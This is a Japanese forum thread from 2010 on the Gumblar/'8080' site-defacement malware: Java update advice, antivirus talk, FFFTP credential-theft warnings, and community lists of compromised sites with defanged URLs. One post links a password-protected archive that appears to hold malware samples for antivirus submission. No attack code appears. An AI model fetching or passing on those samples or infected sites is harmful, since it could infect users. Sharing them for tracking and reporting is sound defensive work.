今JAVA(TM)6 UPDATE 17とJ2SE RUNTIME ENVIRONMENT5.0
がインストールされてます、ADOBE製品はFLASHPLAYER10
しか使ってないんですが一応の対策はこれでOKですか?
ウイルスソフトはNIS2009使ってます

91 :88:2010/01/29(金) 18:28:04
>>89
「プログラムの追加と削除」リストを名前順に並べて
I-O DATA
Microsoft (C++等四つほどあり)
NVIDIA(ドライバ)
となっています
Javaの文字は無いのでインストールされてないようです
>>7の他の対処法でJREだけやっていなかったのでとりあえず安心できます
ありがとうございました

92 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:28:07
Java は Update 18 が最新
バージョンチェックは↓でどうぞ
ttp://jvndb.jvn.jp/apis/myjvn/#VCCHECK


93 :88:2010/01/29(金) 18:30:24
×>>7の他の対処法で
>>7の対処法で

94 :へたれ発掘屋:2010/01/29(金) 18:31:08
【陥落サイト情報】
※名無し最新型は「.ru:X」と記す

沖縄情報ガイド(.ru:X)
tp://www●okiinfo●com/
※サイト内全域?

価格比較 GIOS(GNU GPL)*再改竄*
tp://shop●relax-living●net/bike11/
※トップページは絶賛崩壊中
にしてもGNU GPLって・・・orz

中古車情報の朝日オート(DEBUG)
tp://horizon●f00●jp/
※通報済、未対応

ジェイティメタル(CODE1)
tp://www●jtmetal●jp/data/index2●html
漢方 コバヤシ薬局(.ru:X、DEBUG)
tp://www●sbest-drug●com/


つーほヨロ・・


95 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:32:24
あまり詳しくないので質問。
>>2で最新版(Java(TM)6Update18)にすれば、
・「JREを使われる穴がふさがるよ」なのか
・「JREが新しくなって穴がふさがるよ」なのかどっちなんだろう…

こないだアップデートしてJava(TM)6Update18にしたが
Java (TM) SE Runtime Environment Update 1は特に変化がない…。
確認ページでも最新版がすでにあるといわれる…

JREはいらないなら削除してもいいのかなぁ

96 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:48:17
JAVA関係は一旦総てアンインスコ後に掃除してから最新版をインスコ汁

97 :90:2010/01/29(金) 19:01:58
JAVA(TM)6 UPDATE 17とJ2SE RUNTIME ENVIRONMENT5.0の両方削除して
JAVA(TM)6 UPDATE 18入れました


98 :名無しさん@お腹いっぱい。:2010/01/29(金) 19:02:31
>>72
>何らかの法則、又はランダムで生成してるような希ガス

さすが田宮さんw

99 :名無しさん@お腹いっぱい。:2010/01/29(金) 19:17:00
>>94
コメント無しは固定だったmegaidとDEBUGが可変文字列に変わったようなものだから
ru:XよりDEBUG改とかにした方が特徴的に分かり易くないかな。

100 :名無しさん@お腹いっぱい。:2010/01/29(金) 19:22:20
ロシア多いな

101 :名無しさん@お腹いっぱい。:2010/01/29(金) 19:32:14
>>99
結局固定文字列は「8080」くらいしか残ってなかったり

102 :45:2010/01/29(金) 19:42:06
>>94
沖縄情報
ジェイ・ティ・メタル
漢方 コバヤシ薬局
以上whoisよりめるぽしました。

> 崩壊中
ひょっとして管理者とクラッカーの上書き合戦だったりして。。。

103 :名無しさん@お腹いっぱい。:2010/01/29(金) 20:12:51
連日のように新型が生まれてて恐ろしいな

104 :名無しさん@お腹いっぱい。:2010/01/29(金) 20:23:06
誘導方法や突かれる脆弱性には変化がないのに新型というのはどうかな。
亜種や変種とした方が語弊がないと思う。

105 :名無しさん@お腹いっぱい。:2010/01/29(金) 20:30:43
めんどくさいから「改良型」でいいんじゃないかな

106 :名無しさん@お腹いっぱい。:2010/01/29(金) 20:41:24
鯖缶が怠慢なため
こんなことに...
管理用端末で余所のwebページ閲覧するなよ
毎日パス変えとけボケ

107 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:29:03
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter01/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter04/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter07/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter01/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter06/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter01/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter06/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter04/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter07/index●html

108 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:33:23
セキュリティソフトですが

Avast と MSのやつ だと どっちがいいですか?

109 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:37:01
>>108
たぶんavast、ただしまだv4の方がトラブルが少なく安定だと思う
MSEにはWeb監視機能が無い→発見したときは(実害は無くとも)すでに侵入されてる可能性

110 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:41:13
【so-netセキュリティ通信】

「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
http://www.so-net.ne.jp/security/news/newstopics_201001.html
※よくわかってない人は必読

サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2138

サイト改ざん止まず(2) 改ざんサイト告知一覧(2010年1月14日〜1月28日)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2139

DEBUG→.ru:XXXXには触れてないが、相変わらず早いなw


111 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:53:13
改ざんサイト 大手だけでなく同人・ファンサイトの公表はないのかな

112 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:56:09
>>111
so-netの所では
企業のサイトは(認めてる所は)公表するけど
個人のサイトは難しいのでは?

ここに晒すのもちょっとはばかれるけど、もし見つけたらどうしたものか・・・

113 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:57:20
同人の方もかなり感染してると思う

114 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:58:17
>>108
>>7をやって、今後も最新版がリリースされたら、すぐに最新版を
インストールするようにしてれば、どっちでもいいよ

115 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:59:05
>>108
それ以前に対策をしっかりしましょう

116 :名無しさん@お腹いっぱい。:2010/01/29(金) 21:59:59
so-netはトレンドマイクロより優秀だな

117 :へたれ発掘屋:2010/01/29(金) 22:03:12
>>107
そーゆー貼りかたやめれ。
1コ上の階層を調べてみませう。

あと、コードのタイプを書いておくと
最新型が大好物の検体提出屋さんが拾いやすくなる(はず)だから
可能ならタイプ(CODE1とかDEBUGとか)を書いてくれ。

>>99
勝手に命名してスマソ(仮名って書くの忘れた)
で、名無し最新型の呼び名はどうするよ?


118 :名無しさん@お腹いっぱい。:2010/01/29(金) 22:11:50
>>117
so-netの無印で良くね

119 :名無しさん@お腹いっぱい。:2010/01/29(金) 22:21:44
>>109
ありがとうございます、avaでいきます

>>114,115
そうですね、>>7チェックします



120 :名無しさん@お腹いっぱい。:2010/01/29(金) 22:33:36
>>108
どっちもやめとけ

無料では歯がたたん(笑)


121 :名無しさん@お腹いっぱい。:2010/01/29(金) 22:39:27
でたー有料厨

122 :名無しさん@お腹いっぱい。:2010/01/29(金) 22:42:33
AVでは購入厨とは呼ばないのか

123 :名無しさん@お腹いっぱい。:2010/01/29(金) 22:43:19
優劣は余所で議論しろ

124 :名無しさん@お腹いっぱい。:2010/01/29(金) 22:44:02
でたーのは古事記なのか

125 :名無しさん@お腹いっぱい。:2010/01/29(金) 22:49:31
http://1-noriba.net/

126 :45:2010/01/29(金) 22:59:37
>>107
whoisよりめるぽ

127 :名無しさん@お腹いっぱい。:2010/01/29(金) 23:17:21
知らん間に絶賛進化中かよ・・・すげぇなこの技術

真面目に使えばめちゃめちゃ儲けられるんじゃないのか。

128 :名無しさん@お腹いっぱい。:2010/01/29(金) 23:20:22
こういう人らってケタ違いに儲けてるらしいよ

129 :名無しさん@お腹いっぱい。:2010/01/29(金) 23:31:23
裏市場でケタ違いに儲けて、万が一逮捕されても出所後には腕を見込まれて有名セキュリティ関連企業に就職とかあるよなw
まあマルウェア作成者の逮捕なんてされる方が珍しいだろうけど

130 :45:2010/01/29(金) 23:31:31
っと、また見逃し。。。
>>85
乙乙乙です!

はやく直ればいいのですが…

131 :名無しさん@お腹いっぱい。:2010/01/29(金) 23:52:57
海外サイトでもGumblarって流行ってるのだろうか

132 :名無しさん@お腹いっぱい。:2010/01/30(土) 00:09:35
仙台市災害ボランティアセンター
ttp://www●ssvc●ne●jp/index●html (ru:X=DEBUG改)
未通報

133 :名無しさん@お腹いっぱい。:2010/01/30(土) 00:13:41
ttp://www4.atpages.jp/ksyk/

ここの3.に書かれてるNEC製パソコンは古いJavaが見えないってホント?

134 :名無しさん@お腹いっぱい。:2010/01/30(土) 00:14:11
airseasite.ru
きりがないなぁ

135 :名無しさん@お腹いっぱい。:2010/01/30(土) 00:43:09
>133
マジ
しかもアンインスコできない(最新版消すと古いのに書き戻される)

136 :名無しさん@お腹いっぱい。:2010/01/30(土) 00:46:35
こいつ、まじでやっかいだな、いろいろとパターンをかえてきやがる


137 :名無しさん@お腹いっぱい。:2010/01/30(土) 00:48:31
あやしいところは、チェッカー全部とおしてからみにいくんだな

138 :名無しさん@お腹いっぱい。:2010/01/30(土) 00:50:10
どうやら新パターン構築中で沈静化してるみたいだな

139 :名無しさん@お腹いっぱい。:2010/01/30(土) 00:55:44
>>133-135
!?
家族のノートPCはNECなんだが…
一応対策しとけと言っといたが駄目…なのかい

140 :45:2010/01/30(土) 01:08:56
>>132
めるぽ

141 :名無しさん@お腹いっぱい。:2010/01/30(土) 01:09:01
>>139
新しいJAVAいれとけば大丈夫

142 :名無しさん@お腹いっぱい。:2010/01/30(土) 01:13:05
>139
コンパネいじる・JavaRa等の削除ツールを使うetc
いろいろ手はあるが確実性に欠けたり自己責任なんだよなあ

143 :名無しさん@お腹いっぱい。:2010/01/30(土) 01:18:51
消せばコンパネからjavaが消えるなら問題ない
残るなら、あらかじめ仕込があるってことだから、神経質なひとは削除ツール使うしかない

144 :名無しさん@お腹いっぱい。:2010/01/30(土) 01:21:53
>>139
とりあえず最新版入れれば、古いバージョンを決め打ちされない限り大丈夫のはず
出来れば決め打ちに備えて、古いバージョンは一掃したいけど…

145 :139:2010/01/30(土) 01:23:32
ありがとう
細かいこと言ってもわからんだろうし俺がなんとかやるか…

146 :142:2010/01/30(土) 01:31:33
>143
ごめん、言葉が足りなかったorz
消しても窓のコンパネにはがっつり残るんだよ>NEC

Java最新版のコンパネってか設定にバージョン管理する項目があるから
そこで古いバージョンのチェックを外せば回避できるかな?って思ったんだ

ROMに戻る、スマンカッタ

147 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:05:31
だから大手メーカーのPCは絶対買わないという人居るよな。
昔NとかFとかのメーカー、購入したときの情報が.txtで残っていて
JAVAとJavaスクリプトの組み合わせで読み取れて個人情報抜かれるなんて都市伝説あったなぁ。

スレチすまん。もう寝る。

148 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:09:43
古いjava消したらEclipseとNetBeansがおかしくなったでござる

149 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:13:25
javahome影響するんだっけか

150 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:26:23
JRE 1.5はこの前出たu22が最終なんだよな。
本当に1.5じゃないと動かないシステムを組んでいるところは、これ以上の新たな脆弱性が
発見されたときはどうするんだろうか。

151 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:35:54
くれくれで申し訳ないですが教えてください。
サーバからローカルにファイルをすべてコピーして
スクリプトの部分を一括置換で消そうとしたのですが
ファイルが開きません。
これは新種の亜種でしょうか。
通常のダブクリでもアプリからでも開けません。
今はhogehoge.htmlをhogehoge.txtにリネームして開いてます。
(この方法なら開けるんです)
ただファイル数が5000をこすので一括置換したいんです。
開く方法をご存知の方いらっしゃいましたら教えてください。
よろしくお願いしますorz

152 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:43:03
サーバ側にしかファイル残ってないの?
アップロードする前のファイルはどこへいったの?
オリジナルファイルがないってありえなくね?

153 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:44:16
あと開かないってのがどう開かないのかわからない
単に関連付けが変わっただけとかじゃなかろうか
エスパー先生おねがいします

154 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:46:00
>>152
ありがとうございます。
静的ページはオリジナルがあるのですが
CMSで生成されたページはサーバにしか残ってないんですorz

155 :名無しさん@お腹いっぱい。:2010/01/30(土) 02:52:35
>>153
例えばメモ帳にドラッグ&ドロップすると「アクセスが拒否されました」とアラートが表示されます。
ドリウィで開こうとすると
「C;\Documents and ・・・・hogehoge.html へのアクセスは拒否されました」と表示されます。

156 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:27:29
「プロパティ」−「セキュリティ」タブでのアクセス許可すらいじれないようになってます

157 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:32:57
テキストファイルとして開けるのなら
置換機能のあるテキストエディタ使えばいいんじゃなかろうか

158 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:38:32
3000以上あるファイルの拡張子を全部txtにってのは最終手段だと思ってますorz

159 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:40:58
開けないファイルそれぞれがウイルスを内包している模様。ダブクリしたり開こうとするとアンチウイルスソフトから警告が出る。

160 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:43:02
5000もあるならファイルネーム一括置換でhtmlをtxtにリネーム

161 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:43:05
ウイルス名はJS/Obfuscated。ちなみにアンチウイルスソフトを切っても警告が出てこなくなるだけで、ファイルを開くことはできない。

162 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:47:16
Kaspersky Online Scannerのメンテナンス長すぎなんとかしろ

163 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:49:11
>>160
rename *.html *.txt
<<<
でbatを作ってリネームしたんですがbatファイルのあるフォルダにしか適用される下の階層のhtmlファイルなどの拡張子がそのままなんですorz

164 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:51:34
>>162
同感

165 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:52:03
リネームツールなんか山ほどあるんだから、ベクター辺りで探して見れ

166 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:53:41
古いバージョンのJREじゃないと不便って人は
もうブラウザの方でJAVAの実行を切っておくしかなさそうだな。
で、どうしても必要な時だけ手動でONにする、と。

167 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:55:46
えっ?

168 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:56:46
意味わかんない、ねー

169 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:56:57
えっ なにそれこわい

170 :名無しさん@お腹いっぱい。:2010/01/30(土) 03:57:45
えっ なにそれ脆弱商売

171 :名無しさん@お腹いっぱい。:2010/01/30(土) 04:00:18
自演乙

172 :名無しさん@お腹いっぱい。:2010/01/30(土) 04:06:29
セキュリティソフトウェアメーカーのPC Toolsによれば、
マルウェアのロシア発のマルウェアの割合は27.9%。これに対して中国の割合は26.5%。
過去の調査では世界2位になってしまった米国は今回、3位(10%弱)となった。
          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅した
にも関わらず、ロシアの生産量が落ちていないことを指摘している。

PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Network
がいなくなったところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。
               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
「結果として、過去にないくらい多くのウイルスやスパイウェアがロシアから出てきている。
そして、マルウェアの複雑さが増している」(Shevchenko氏)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織
よりも追跡しやすかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティング
サービスが、マレーシアや中国、パナマ、シンガポール、タイ、トルコ、インドのサーバに目を
向けている」

http://japan.zdnet.com/news/sec/story/0,2000056194,20367817,00.htm

173 :名無しさん@お腹いっぱい。:2010/01/30(土) 04:14:05
名探偵コナンならあっさり

174 :名無しさん@お腹いっぱい。:2010/01/30(土) 04:41:57
おせわになってます・・・トップページが書き換えられてる(忍者HP質問板)
ttp://csbbs.ninja.co.jp/Thread_View/40700/

新パターンらしい

175 :名無しさん@お腹いっぱい。:2010/01/30(土) 04:45:09
やる気!元気!井脇! ガハハ!

176 :名無しさん@お腹いっぱい。:2010/01/30(土) 05:23:23
忍者って解析ツールのとこか

177 :名無しさん@お腹いっぱい。:2010/01/30(土) 06:08:20
まとめ第9版
ttp://labs-uploader.sabaitiba.com/virus/download/1264799189.rar
PASS:virus

もう嫌だこのウイルス・・・(´・ω・`)

178 :名無しさん@お腹いっぱい。:2010/01/30(土) 06:29:42
そういやJavaって以前は最新入れても思いっきり
古いver残ってたけど、Java6 Update12あたり?(うろ覚えだけど)
から一応「上書き」されて古いのは消えるようになってますよね。

Firefoxだと古いのは残って消す必要あるし、プラグイン怖い
WhiteListとか意味ねええええ




179 :名無しさん@お腹いっぱい。:2010/01/30(土) 07:14:47
古いJAVA消してよかったんだな。ディスク容量が切迫してるとき
邪魔なんだよなって思ってたんだけどw

180 :名無しさん@お腹いっぱい。:2010/01/30(土) 07:24:14
>>177
いつもありがとう、ご苦労様ですm(__)m

181 :名無しさん@お腹いっぱい。:2010/01/30(土) 07:56:26
>>177
解凍後 tar.gz にてM$,ClamAvに送付。


182 :名無しさん@お腹いっぱい。:2010/01/30(土) 08:01:07
俺のパソコンもNECだからかな? プログラムの追加と削除にJREが載ってない。
とりあえず>>2にあるjavaのバージョンチェックして、そこで出てきた最新版を
インストールしたんだけどこれで大丈夫なのかな? 情弱で申し訳ない。

183 :182:2010/01/30(土) 08:06:12
上げてしまった。重ね重ね申し訳ない…


184 :名無しさん@お腹いっぱい。:2010/01/30(土) 08:20:40
お絵ちゃ大好き!な腐まんこばっかりになってしまった

185 :名無しさん@お腹いっぱい。:2010/01/30(土) 08:58:02
>>182
Secunia Personal Software Inspector (PSI) 1.5.0.1で
インストール済みのアプリが最新かどうか古いバージョンがあるかチェックするといいよ
ttp://secunia.com/vulnerability_scanning/personal/


186 :名無しさん@お腹いっぱい。:2010/01/30(土) 10:11:30
javara使えば古いものからゴミまで消してくれるでござる。

187 :名無しさん@お腹いっぱい。:2010/01/30(土) 10:35:49
>>162
ニフティの方は使えたよ。(@niftyウイルスチェックサービス/中身はかすぺる)
本家がメンテしてるってことは新しいやつに対応してないのかもしらんが。

188 :名無しさん@お腹いっぱい。:2010/01/30(土) 10:40:24
古いバージョンのJava Runtime Environmentはアンインストールしてもよい − @IT
http://www.atmarkit.co.jp/fwin2k/win2ktips/994uninstjre/uninstjre.html
2008/03/07
■ Java Runtime Environmentをアップデートすると、新しいバージョンが新規にインストールされる。
■ Java Runtime Environmentの容量はバージョンによっても異なるが、70Mbytes以上もある。
■ 古いバージョンのJava Runtime Environmentをアンインストールすれば、ハーディスクの空き容量を増やすことができる。

189 :名無しさん@お腹いっぱい。:2010/01/30(土) 11:26:03
>>187
あれ、こないだやったらエラーで使えなかったぜnifty

190 :名無しさん@お腹いっぱい。:2010/01/30(土) 11:40:42
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html

191 :名無しさん@お腹いっぱい。:2010/01/30(土) 11:41:18
ニフティここずっと死んでるって話だったけど生き返ったのか

192 :名無しさん@お腹いっぱい。:2010/01/30(土) 11:49:06
>>190
それ、ある意味凄いな
知名度があるってことか・・・

可能性
・単に知名度があったから
・犯人は日本に詳しい
・犯人は日本人

193 :名無しさん@お腹いっぱい。:2010/01/30(土) 11:50:27
>>190
まじかよ。。

194 :名無しさん@お腹いっぱい。:2010/01/30(土) 11:51:29
「白痴ランド」のトップにあるリンク先,GumblarChecker 2で検出
リストのうち,最後の三箇所
ttp://www●hakuchi●jp/bodypaint/
ttp://www●hakuchi●jp/57577/
ttp://www●hakuchi●jp/OTSUYA/

195 :名無しさん@お腹いっぱい。:2010/01/30(土) 11:53:43
白濁ランドに見えた俺は病気

196 :名無しさん@お腹いっぱい。:2010/01/30(土) 12:04:34
>>190
それ普通に使ってて、年末にJRE未更新状態で感染サイト踏まされたが
自サイト改ざんは未だなくスキャンでも何も出てこない
何故俺は助かったんだ…

197 :名無しさん@お腹いっぱい。:2010/01/30(土) 12:23:44
>>195
えっち

198 :名無しさん@お腹いっぱい。:2010/01/30(土) 12:32:04
>>190
まぁよく使われるFTP蔵なんてそんな数あるわけでもないんで
有名どころは網羅されてるんでねーの。
FileZilla、WinSCP、FTPExplorer、etc.

199 :名無しさん@お腹いっぱい。:2010/01/30(土) 12:44:48
FTPプロトコルのキャプチャぐらいはしてるんじゃないかな?
だからFFFTPだけに限った話では無いわけで。

FFFTPだけだったら海外サイトまでなぜ感染するんだろうなあ、とか思ったり。

200 :名無しさん@お腹いっぱい。:2010/01/30(土) 12:46:45
SFTPのおいらに隙はなかった

201 :名無しさん@お腹いっぱい。:2010/01/30(土) 12:50:27
>>185
どうもありがとうございます。
ちなみにjavaの更新方法は間違ってないよね。確か6 Update 18ってのに更新したはずだけど…

202 :名無しさん@お腹いっぱい。:2010/01/30(土) 12:57:07
>>199
いやFFFTPを起動していないのにサイトやられちゃったという話が出た
(FFFTPはレジストリかiniに保存する)ので驚いているわけで。
世界でおそらく最も使われているのはFileZillaで、これは前から
malwareにしょっちゅう抜かれてるんだけどね。

203 :名無しさん@お腹いっぱい。:2010/01/30(土) 13:02:21
>>202
感染したPCの中を覗ける

204 :名無しさん@お腹いっぱい。:2010/01/30(土) 13:08:55
>>202
なるほど、そういうことね。
ありがとう

205 :名無しさん@お腹いっぱい。:2010/01/30(土) 13:26:01
>>202
マジでこえーよ

206 :名無しさん@お腹いっぱい。:2010/01/30(土) 13:34:22
俺のnec lavie LR500/c(五年前)だと、java6 Updateをアンインストールすると
コンパネに残らないな

残る人の機種は何年前?

207 :名無しさん@お腹いっぱい。:2010/01/30(土) 13:50:54
8080てなんて読むの?
ハチゼロハチゼロ
ハチマルハチマル
パオパオ

208 :名無しさん@お腹いっぱい。:2010/01/30(土) 14:50:49
ハチレーハチレ−
で読んでるけど

209 :名無しさん@お腹いっぱい。:2010/01/30(土) 14:53:17
>>189
何度か繰り返しやってたらできたよ

210 :名無しさん@お腹いっぱい。:2010/01/30(土) 14:56:51
Java使うアプリってそんなにあるかな?
通常のネット閲覧ではあんまり使わないから余計な物は入れない方が良いと思う。

211 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:07:06
ガンブラー型ウイルス猛威、サイト改ざん悪質化
1月30日14時41分配信 読売新聞

http://headlines.yahoo.co.jp/hl?a=20100130-00000527-yom-soci

>新タイプでは、従来型と違い、クレジットカード番号を盗む仕組みが加わるなど、犯罪の意図が明確になってきているという。


これってネタ? マジ?

212 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:26:51
>ところが、この頃から今年にかけて“第3波”が来襲。今度は、不正サイトに誘導された後、偽のウイルス対策ソフトをインストールさせて、クレジットカード番号などを盗んだり、スパムメール(迷惑メール)配信に利用されたりする恐れがあるという。


Security Toolのことだろうからマジと言えばマジ
今は英語版しかないみたいだけど、日本語版でも出れば騙される人激増するだろうね

ここからは妄想だが、引っ張ってくるマルウェアにキーロガーが加わってくれば、Security Toolのようなフィッシングに近い形の盗み方と違って
PCで番号打っただけで盗むことは可能よね

213 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:38:13
>不正サイトに誘導された後

って書いてあった・・・ガンブラー本体じゃねえじゃん・・・
何だこの如何様記事

214 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:41:21
別に間違ってないけど

215 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:42:33
>>214
社員おつ

216 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:44:35
>不正サイトに誘導された後

ここが間違ってるような気がする。Security Toolって誘導というより8080系に感染したら自動的に引っ張ってきて強制インスコだったような・・・
それともこの記事はSecurity Toolとは別のこと言ってるんだろうか?

217 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:46:45
>>210
ミクシのアプリとか

218 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:46:50
で、FFFTPはアンインスコした方がいいの?

219 :名無しさん@お腹いっぱい。:2010/01/30(土) 15:59:19
その記事にある「地方自治情報センター」の呼び掛け、説明文がGENO仕様なんだな。
後半が昨年秋の古い講演会資料の転載になってるから生じている問題なんだが、
普通のお花畑公務員は、それが最新の情報と勘違いするぞ。

多分センター自体がGENOと8080の違いについてわかってないんだろう。
文頭に別種と書いてはいるが、どう別種なのかわからないままの資料丸写しに見える。
大体、検知システムは来月から試行って段階だしな。
無料だが。

220 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:06:10
まあなんだ・・・持ち上げる気はないんだけど、So-netの記事が一番まとまってると思うよ
スレの最初から読む気が無い奴にはこのリンク出しときゃだいたい分かるだろ。まあそんな奴は長文読む気がない奴も多いのが問題だが・・・

「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

221 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:13:13
>>218
Sota's Web Page
"FFFTPをお使いの方に重要なお知らせ"
ttp://www2.biglobe.ne.jp/~sota/index.html

222 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:17:17
警察や関係機関からの発表を丸書きするだけなのが新聞だよ。
当然 自分らで確認も理解もしてません。

223 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:17:46
公式で、実質アンインストール一択ってアナウンスがでたのか…

224 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:22:23
218ではないがアンインストールした
XPでソフトウェアの追加と削除から削除したら
>>221にある消去すべきとこ
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options \Host(n) : nは数字

HKEY_USERS\固有の番号\Software\Sota
までで以下ないけどこれでいいのかな

225 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:33:13
最新にしておけば>>221は消さなくても今のところOKですよね?

226 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:34:58
>>225
おまえがそう思うのならばそうなんだろう(AA略

227 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:35:44
主語抜けてて何が最新なのかまったく分からん

228 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:37:44
>>227
すまん>>2にあるやつ

229 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:37:57
136 名前:名無しさん@お腹いっぱい。[age] 投稿日:2010/01/30(土) 13:15:35 ID:TnywA9GR0
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性
http://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
Thanks and Farewell FFFTP
http://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/

設定はiniに格納すればおk?

138 名前:名無しさん@お腹いっぱい。[] 投稿日:2010/01/30(土) 15:09:40 ID:IQxi/7CR0
>>136
うん、iniに保存で大丈夫。
レジストリ狙ったマルウェアが出てるだけだから。
アンインストール(笑)

139 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/30(土) 15:22:07 ID:D0RKI4Os0
ウチのレジストリには、>>136のリンク先で示されてる項目が
ないんだけど、そーいうもん?

140 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/30(土) 15:31:26 ID:TnywA9GR0
>>138
ありがとー

自分はDドラにインスコして
CドラのOSは数回再インストールしてるから、
レジストリには何にもないよ>>139

なんだまだまだ使えるんじゃん、それをfarewellてwwwww

大丈夫かこいつら

230 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:41:19
iniファイルも標的にされてるのがわかってないんだろうな
FFFTPと心中するんだろう

231 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:45:26
>>228
心中したいならば、別にそれでかまわんよ、
このウィルスに感染しても個人サイトなら個人の問題だからね。
金かせぐ仕事でFFFTP使ってるなら、やめとけといっとく


232 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:47:45
対策とっても感染するときは感染するし、好きにすればよかろう


233 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:48:55
免責事項の明記と今回の告知で作者は十分に制作者責任を果たしているからな。
あとは何が起こっても完全に使う奴の自己責任だわ。

234 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:49:03
>>228
その対策を全部やってれば"今のところ"感染はしないのでFFFTP使ってても問題なし。"今のところ"はね
後、以前に一回感染してたんならパス変えなきゃ意味無い

